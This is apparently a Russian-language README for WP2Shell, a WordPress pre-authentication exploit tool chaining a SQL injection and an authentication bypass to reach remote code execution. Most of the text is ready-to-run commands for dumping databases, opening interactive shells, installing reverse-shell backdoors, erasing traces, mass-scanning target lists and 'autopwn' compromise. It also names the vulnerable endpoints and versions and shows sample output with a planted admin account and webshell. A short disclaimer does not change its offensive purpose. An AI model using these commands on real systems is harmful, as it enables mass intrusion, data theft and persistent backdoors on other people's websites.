Модульный эксплойт-фреймворк WordPress для атак до аутентификации, объединяющий SQL-инъекции и обход аутентификации для обеспечения удалённого выполнения кода, интерактивных оболочек, бэкдоров и массового сканирования уязвимостей.
CVE-2026-63030 + CVE-2026-60137
Версия: 4.0.0
Автор: G0D150NE
WP2Shell — это инструмент, реализующий полную цепочку эксплуатации WordPress для удалённого выполнения кода (RCE) до аутентификации. Он объединяет две критические уязвимости:
Этот инструмент позволяет полностью скомпрометировать уязвимые установки WordPress без какой-либо аутентификации — от обнаружения до полного RCE и закрепления в системе.
# Clone repository
git clone https://github.com/g0d150ne/wp2shell.git
cd wp2shell
# No dependencies needed - uses Python 3.8+ standard library
chmod +x wp2shell.py
python3 wp2shell.py [COMMAND] [OPTIONS] [TARGET]
| Команда | Описание |
|---|---|
check | Неразрушающее подтверждение уязвимости |
read | Извлечение данных через SQL-инъекцию |
exploit | Полная цепочка RCE до аутентификации |
shell | Развёртывание веб-шелла с существующими учётными данными |
masscan | Массовое сканирование множества целей |
autopwn | Автоматическое обнаружение → сканирование → эксплуатация |
python3 wp2shell.py check https://target.com
python3 wp2shell.py check https://target.com --confirm-timing --sleep 5
Базовый fingerprint:
python3 wp2shell.py read https://target.com
Извлечение пользователей:
python3 wp2shell.py read https://target.com --preset users
Произвольный запрос:
python3 wp2shell.py read https://target.com --query "SELECT @@version"
Дамп всей базы данных:
python3 wp2shell.py read https://target.com --preset dumpall --max-length 4096
Базовая эксплуатация:
python3 wp2shell.py exploit https://target.com
Эксплуатация с интерактивным шеллом:
python3 wp2shell.py exploit https://target.com --interactive
Эксплуатация с установкой бэкдора:
python3 wp2shell.py exploit https://target.com --backdoor --lhost 192.168.1.100 --lport 4444
Эксплуатация с дампом базы данных:
python3 wp2shell.py exploit https://target.com --dumpdb
Эксплуатация с очисткой (удаление следов):
python3 wp2shell.py exploit https://target.com --cleanup
python3 wp2shell.py shell https://target.com --user admin --password secret123 --interactive
python3 wp2shell.py shell https://target.com --user admin --password secret123 --command "whoami"
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt
# Scan with 50 threads
python3 wp2shell.py masscan --file targets.txt --threads 50 --output results.csv
python3 wp2shell.py autopwn --domain example.com --lhost 192.168.1.100
Этот режим:
После эксплуатации вы получаете полноценный интерактивный шелл:
python3 wp2shell.py exploit https://target.com -i
[*] Interactive shell — type 'exit' to quit
/var/www/html $ id
uid=33(www-data) gid=33(www-data)
/var/www/html $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
/var/www/html $ exit
| Опция | Описание |
|---|---|
--timeout | HTTP-таймаут в секундах (по умолчанию: 30) |
--proxies | Список прокси через запятую (например, http://127.0.0.1:8080) |
--stealth | Включить стелс-режим со случайными задержками |
-v, --verbose | Включить отладочный вывод |
-q, --quiet | Подавить баннер и информационные сообщения |
| Опция | Описание |
|---|---|
--prefix | Префикс таблиц (по умолчанию: wp_) |
--auto-prefix | Автоматическое определение префикса таблиц |
--max-length | Максимум символов на значение (по умолчанию: 128) |
--technique | Техника извлечения: auto/union/error/blind |
--preset | Пресет данных: fingerprint/users/dumpall |
--query | Произвольное SQL-выражение для извлечения |
| Опция | Описание |
|---|---|
--prefix | Префикс таблиц (по умолчанию: wp_) |
--no-discover | Пропустить автоматическое обнаружение, использовать значения по умолчанию |
-i, --interactive | Открыть интерактивный шелл после эксплуатации |
-c, --command | Выполнить одну команду после эксплуатации |
--backdoor | Установить бэкдор для сохранения доступа |
--lhost | LHOST для reverse-шелла (по умолчанию: 10.0.0.1) |
--lport | LPORT для reverse-шелла (по умолчанию: 4444) |
--dumpdb | Сделать дамп базы данных после эксплуатации |
--cleanup | Удалить созданного пользователя и веб-шелл при выходе |
SQL-инъекция (CVE-2026-63030)
/wp-json/batch/v1author_exclude уязвим к слепой SQL-инъекции на основе времени (time-based blind SQLi)Обход аутентификации (CVE-2026-60137)
/_embed| Версия | Статус |
|---|---|
| 6.9.0 | ✅ Уязвимая |
| 6.9.1 | ✅ Уязвимая |
| 6.9.2 | ✅ Уязвимая |
| 6.9.3 | ✅ Уязвимая |
| 6.9.4 | ✅ Уязвимая |
| 7.0.0 | ✅ Уязвимая |
| 7.0.1 | ✅ Уязвимая |
| ≥ 7.0.2 | ❌ Исправлена |
| Техника | Скорость | Объём данных | Требования |
|---|---|---|---|
| UNION | ⚡ Очень высокая | Без ограничений | Цель не должна фильтровать UNION |
| Error | 🚀 Высокая | ~30 символов/запрос | Цель должна отображать сообщения об ошибках |
| Blind | 🐢 Низкая | Без ограничений | Доступен булевый оракул |
░▒▓█▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓███████▓▒░▒▓███████▓▒░ ░▒▓███████▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░▒▓█▓▒░ ░▒▓█▓▒░
CVE-2026-63030 + CVE-2026-60137
WordPress Pre-Auth RCE [v4.0.0]
+ G0D150NE
[1/7] Reconnaissance
Target: https://target.com
WordPress 6.9.3
[+] UNION extraction available (in-band, 1 request/value)
[2/7] Enumerating target
[+] Discovered table prefix: wp_
[3/7] Locating embed target
[+] Embed URL: https://target.com/2020/01/01/hello-world/
[4/7] Seeding oEmbed cache posts
[+] Seed payload delivered
[5/7] Extracting cache post IDs
[+] Cache IDs: [12345, 12346, 12347, 12348]
[6/7] Triggering escalation chain
[+] Administrator created via re-entry chain
[7/7] Deploying webshell
[+] Authenticated
[+] RCE confirmed
uid: www-data
[+] ========================================================
[+] TARGET COMPROMISED
[+] Admin: wp_service_a1b2 / G7hK9xQw2p$L!mN
[+] Shell: https://target.com/wp-content/plugins/cache_a1b2/cache_a1b2.php
[+] ========================================================
Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Использование против систем без явного разрешения незаконно. Авторы не несут ответственности за любое неправомерное использование.
Нашли ошибку? Хотите улучшить инструмент? Pull request'ы приветствуются!
Лицензия MIT — подробности см. в файле LICENSE.